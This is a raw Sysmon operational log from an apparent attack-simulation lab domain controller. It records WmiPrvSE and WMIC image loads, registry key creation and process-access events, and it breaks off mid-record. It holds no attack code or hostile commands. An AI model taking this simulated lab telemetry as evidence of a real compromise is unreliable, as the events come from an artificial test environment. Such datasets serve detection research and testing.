Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057348541Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.742{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 12241200x800000000000000057348540Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.742{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\system32\wbem\wmiprvse.exeHKLM\SOFTWARE\Microsoft\Wbem 12241200x800000000000000057348539Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.742{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\system32\wbem\wmiprvse.exeHKLM\SOFTWARE\Microsoft 12241200x800000000000000057348538Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.742{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\system32\wbem\wmiprvse.exeHKLM\SOFTWARE 12241200x800000000000000057348537Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.742{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\system32\wbem\wmiprvse.exeHKLM\SOFTWARE\Microsoft\Wbem 12241200x800000000000000057348536Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.742{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\system32\wbem\wmiprvse.exeHKLM\SOFTWARE\Microsoft 12241200x800000000000000057348535Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.742{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\system32\wbem\wmiprvse.exeHKLM\SOFTWARE 734700x800000000000000057348534Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.742{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057348533Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.741{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057348532Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.741{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057348531Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.741{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057348530Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.741{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057348529Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.741{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057348528Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.741{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057348527Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.740{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\wbemcomn.dll10.0.14393.4530 (rs1_release.210705-0736)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemcomn.dllMD5=91E2160941219FFEBE4093E6681BE4CF,SHA256=3B8AA86EAF2200F53A6EB57B08A34F1BA5E467B72E5002C3BCBF20AF40D98CD1trueMicrosoft WindowsValid 734700x800000000000000057348526Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.740{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\ncobjapi.dll10.0.14393.0 (rs1_release.160715-1616)-Microsoft® Windows® Operating SystemMicrosoft CorporationNCObjAPI.DLLMD5=EA51AB4DE69030FC62B5014175D27A88,SHA256=774A8136F6FC789952548DA2A72F2E53E32A33E91C48EA707C1D823058515DABtrueMicrosoft WindowsValid 734700x800000000000000057348525Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.740{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\wbem\fastprox.dll10.0.14393.0 (rs1_release.160715-1616)WMI Custom MarshallerMicrosoft® Windows® Operating SystemMicrosoft Corporationfastprox.dllMD5=C2F7834269D565263C65757EDE37A66C,SHA256=17651A35255229CE95F065CA1BCCC4867B43DA879D72AFCC91FBA4768225C7D3trueMicrosoft WindowsValid 734700x800000000000000057348524Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.740{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057348523Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.738{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057348522Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.738{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057348521Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.737{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057348520Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.737{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\wbem\WmiPrvSE.exe10.0.14393.2155 (rs1_release_1.180305-1842)WMI Provider HostMicrosoft® Windows® Operating SystemMicrosoft CorporationWmiprvse.exeMD5=E1BCE838CD2695999AB34215BF94B501,SHA256=1D7B11C9DEDDAD4F77E5B7F01DDDDA04F3747E512E0AA23D39E4226854D26CA2trueMicrosoft WindowsValid 10341000x800000000000000057348519Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.736{8B6011A9-8868-6164-0500-00000000F101}424520C:\Windows\system32\csrss.exe{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057348518Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.736{8B6011A9-886D-6164-0C00-00000000F101}8489544C:\Windows\system32\svchost.exe{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057348517Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.706{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exe10.0.14393.2155 (rs1_release_1.180305-1842)WMI Provider HostMicrosoft® Windows® Operating SystemMicrosoft CorporationWmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -EmbeddingC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{8B6011A9-886D-6164-E403-000000000000}0x3e40SystemMD5=E1BCE838CD2695999AB34215BF94B501,SHA256=1D7B11C9DEDDAD4F77E5B7F01DDDDA04F3747E512E0AA23D39E4226854D26CA2{8B6011A9-886D-6164-0C00-00000000F101}848C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 12241200x800000000000000057348516Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348515Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057348514Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348513Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348512Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348511Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348510Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348509Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348508Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348507Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 734700x800000000000000057348506Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.673{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL15.0.4569.1503Microsoft Office XML MIME FilterMicrosoft Office InfoPathMicrosoft Corporationmsoxmlmf.dllMD5=B5EDAEFD10131A8CBF234565B94F172A,SHA256=738E134837092E5A84A43096CA2C1A0BD87C16B6F14670E4F64B0EE65ACCACC8trueMicrosoft CorporationValid 12241200x800000000000000057348505Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348504Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348503Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348502Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348501Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348500Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348499Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348498Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348497Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348496Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348495Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348494Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348493Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348492Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348491Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348490Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057348489Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348488Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348487Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348486Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348485Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348484Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348483Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348482Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348481Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057348480Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.658{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wininet.dll11.00.14393.4583 (rs1_release.210730-1850)Internet Extensions for Win32Internet ExplorerMicrosoft Corporationwininet.dllMD5=524876363DA8F469C13E0818256B6131,SHA256=DAA85FEAB4553D9A203A85A58C8CB26A2784E0D33226B41AAE98471DAE75C035trueMicrosoft WindowsValid 12241200x800000000000000057348479Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348478Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348477Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348476Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348475Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348474Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348473Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348472Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348471Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348470Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348469Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348468Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348467Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.705{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 10341000x800000000000000057348466Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 